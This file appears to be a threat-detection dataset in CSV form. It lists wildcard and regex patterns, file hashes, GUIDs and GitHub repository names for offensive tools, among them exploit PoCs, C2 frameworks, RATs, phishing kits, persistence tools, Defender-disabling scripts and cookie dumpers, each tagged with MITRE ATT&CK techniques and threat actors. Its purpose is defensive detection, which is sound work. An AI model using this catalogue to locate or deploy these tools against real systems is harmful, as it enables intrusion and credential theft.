"*CVE-2023-21768-AFD-Driver-EoP-Patch-Downgrade/Config.xml*",".{0,1000}CVE\-2023\-21768\-AFD\-Driver\-EoP\-Patch\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","39280"
"*CVE-2023-23397.ps1*",".{0,1000}CVE\-2023\-23397\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","39281"
"*CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ*",".{0,1000}CVE\-2023\-46604\-RCE\-Reverse\-Shell\-Apache\-ActiveMQ.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","39282"
"*CVE-2024-1086/exploit*",".{0,1000}CVE\-2024\-1086\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","39283"
"*CVE-2024-1086-1.0.0.zip*",".{0,1000}CVE\-2024\-1086\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","39284"
"*CVE-2024-22274-RCE.py*",".{0,1000}CVE\-2024\-22274\-RCE\.py.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","1","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","39285"
"*CVE-2024-49138-POC.exe*",".{0,1000}CVE\-2024\-49138\-POC\.exe.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","1","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","39286"
"*CVE-2024-49138-POC.rc*",".{0,1000}CVE\-2024\-49138\-POC\.rc.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","39287"
"*cvescanner.py*",".{0,1000}cvescanner\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","39288"
"*cwB0AGEAcgB0ACAAYwBhAGwAYwA=*",".{0,1000}cwB0AGEAcgB0ACAAYwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","39289"
"*cyberark/ACLight*",".{0,1000}cyberark\/ACLight.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","39291"
"*cyberark/kubesploit*",".{0,1000}cyberark\/kubesploit.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","39292"
"*cyberark/PipeViewer*",".{0,1000}cyberark\/PipeViewer.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","39293"
"*cyberarkrules@gmail.com*",".{0,1000}cyberarkrules\@gmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39294"
"*cybersectroll/SharpPersistSD*",".{0,1000}cybersectroll\/SharpPersistSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","39316"
"*cyclone.hashesorg.hashkiller.combined*",".{0,1000}cyclone\.hashesorg\.hashkiller\.combined.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","39317"
"*CykuTW/tsh-go*",".{0,1000}CykuTW\/tsh\-go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","39318"
"*cylance/SMBTrap*",".{0,1000}cylance\/SMBTrap.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","39319"
"*cyllective/nimproxydll*",".{0,1000}cyllective\/nimproxydll.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","39320"
"*cypheroth -u neo4j -p *",".{0,1000}cypheroth\s\-u\sneo4j\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","39321"
"*-d * bruteforce -*",".{0,1000}\-d\s.{0,1000}\sbruteforce\s\-.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","39326"
"*-d kali-linux *",".{0,1000}\-d\skali\-linux\s.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","39327"
"*D Y N A S T Y  - P E R S I S T*",".{0,1000}D\sY\sN\sA\sS\sT\sY\s\s\-\sP\sE\sR\sS\sI\sS\sT.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","39328"
"*D0:B6:9D:86:6D:AE:B4:E1:CA:F0:C1:F5:4D:82:45:7E:13:06:CD:1A:DE:49:A3:80:DC:21:6A:5C:A8:F4:84:1B*",".{0,1000}D0\:B6\:9D\:86\:6D\:AE\:B4\:E1\:CA\:F0\:C1\:F5\:4D\:82\:45\:7E\:13\:06\:CD\:1A\:DE\:49\:A3\:80\:DC\:21\:6A\:5C\:A8\:F4\:84\:1B.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#certificae #linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","39329"
"*d00c00f1992a98fd03f1d19ec888e3931202b970fda01d59914275235cb0e4f5*",".{0,1000}d00c00f1992a98fd03f1d19ec888e3931202b970fda01d59914275235cb0e4f5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39332"
"*D00C849B-4FA5-4E84-B9EF-B1C8C338647A*",".{0,1000}D00C849B\-4FA5\-4E84\-B9EF\-B1C8C338647A.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","39333"
"*D00MFist/Mystikal*",".{0,1000}D00MFist\/Mystikal.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","39334"
"*D00Movenok/HTMLSmuggler*",".{0,1000}D00Movenok\/HTMLSmuggler.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","39335"
"*d013c82d6fa072f62559f257d81b72136dc33908494fdd1214c2c55dbf590a8b*",".{0,1000}d013c82d6fa072f62559f257d81b72136dc33908494fdd1214c2c55dbf590a8b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39336"
"*d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928*",".{0,1000}d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39337"
"*d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928*",".{0,1000}d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39338"
"*d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928*",".{0,1000}d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39339"
"*d0179fd6daffa7343ce3aebdfb00921c9a69e26cadc61d2f1514e8515c5119ce*",".{0,1000}d0179fd6daffa7343ce3aebdfb00921c9a69e26cadc61d2f1514e8515c5119ce.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","39340"
"*d01dcb5cb218aa1cf3e7e942a101d371090db7dc7a29acdd905b0932e87c6668*",".{0,1000}d01dcb5cb218aa1cf3e7e942a101d371090db7dc7a29acdd905b0932e87c6668.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","#filehash","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","39341"
"*d02161cdc91cdee273f8b6e47f98a322756847ae3b5f4efe6d439fa5e13f9039*",".{0,1000}d02161cdc91cdee273f8b6e47f98a322756847ae3b5f4efe6d439fa5e13f9039.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","39342"
"*d027404d259a269dc52eb697868f7e91cd32888fc9659d1851441aaa9ea3b8bd*",".{0,1000}d027404d259a269dc52eb697868f7e91cd32888fc9659d1851441aaa9ea3b8bd.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","39343"
"*d029b40b87bd1462c77138f017ab6914a3753c4ec47bcbf192231a6b2585cf36*",".{0,1000}d029b40b87bd1462c77138f017ab6914a3753c4ec47bcbf192231a6b2585cf36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39345"
"*d0315c0ae104a656d1b6787f8929a324193f65935b54514107f9ddb7639784d3*",".{0,1000}d0315c0ae104a656d1b6787f8929a324193f65935b54514107f9ddb7639784d3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39347"
"*d03701f674555a2d9754d90179f2af83782a2f647e8f8c2355e8f8d7d9c84870*",".{0,1000}d03701f674555a2d9754d90179f2af83782a2f647e8f8c2355e8f8d7d9c84870.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39349"
"*d03ed31e7d6b56b88203655622b4455767b43389fcee203370c6c292f7d37d7f*",".{0,1000}d03ed31e7d6b56b88203655622b4455767b43389fcee203370c6c292f7d37d7f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39350"
"*d044393f7a9e9536cc03cec12137074d41dd338c0182bbd8a4ca165f79f5a3d9*",".{0,1000}d044393f7a9e9536cc03cec12137074d41dd338c0182bbd8a4ca165f79f5a3d9.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","39351"
"*d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022*",".{0,1000}d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39354"
"*d04cd33cbf5406ac9d9ecfef2276fa1188526125f52c01233542c701f624d7a5*",".{0,1000}d04cd33cbf5406ac9d9ecfef2276fa1188526125f52c01233542c701f624d7a5.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","39355"
"*d0659e8489bc633b617e86f4e7994a593ada5cfc8463f79631d9672623b79750*",".{0,1000}d0659e8489bc633b617e86f4e7994a593ada5cfc8463f79631d9672623b79750.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","39356"
"*d0679dcc64ecf46c8ac74974a340e254ecd4a9fc4db26ccf43b94e2f71ff6eef*",".{0,1000}d0679dcc64ecf46c8ac74974a340e254ecd4a9fc4db26ccf43b94e2f71ff6eef.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39357"
"*d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068*",".{0,1000}d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","39358"
"*d06bb0bbcc2307ccd8c36299b624fa84849fb3b525ec2321be8a1ed0ca88fe3e*",".{0,1000}d06bb0bbcc2307ccd8c36299b624fa84849fb3b525ec2321be8a1ed0ca88fe3e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39359"
"*d06ca6d1ef102f243774b1c4da1cabb414b015e7982c8eec3b54dbf728003248*",".{0,1000}d06ca6d1ef102f243774b1c4da1cabb414b015e7982c8eec3b54dbf728003248.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","39360"
"*d06d9e05ba5582691f8d5939cbbc37e171260c088a60770e2d45c27c9f1ac2ed*",".{0,1000}d06d9e05ba5582691f8d5939cbbc37e171260c088a60770e2d45c27c9f1ac2ed.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","39361"
"*d071605c35f25451217ac8e22521b986d9b478e520abf91320ce39fda8b16c0a*",".{0,1000}d071605c35f25451217ac8e22521b986d9b478e520abf91320ce39fda8b16c0a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39362"
"*d0733560ad65a7123d380f6be4007ce0f0e56356f9dc1729e628342bb96892ab*",".{0,1000}d0733560ad65a7123d380f6be4007ce0f0e56356f9dc1729e628342bb96892ab.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39363"
"*d07bc5045b8309245debb4c48cf0854f3b43d24cc3b19618154645abe80129b4*",".{0,1000}d07bc5045b8309245debb4c48cf0854f3b43d24cc3b19618154645abe80129b4.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","39366"
"*d081972104ca7a2078d1335415bfc8b4c948bf8e79aa7b6ad70ae4a6d1353c00*",".{0,1000}d081972104ca7a2078d1335415bfc8b4c948bf8e79aa7b6ad70ae4a6d1353c00.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","39367"
"*d081d04cfe16745774ef745354309ad25c38ebd8408128ead509c5f18938ec6a*",".{0,1000}d081d04cfe16745774ef745354309ad25c38ebd8408128ead509c5f18938ec6a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39368"
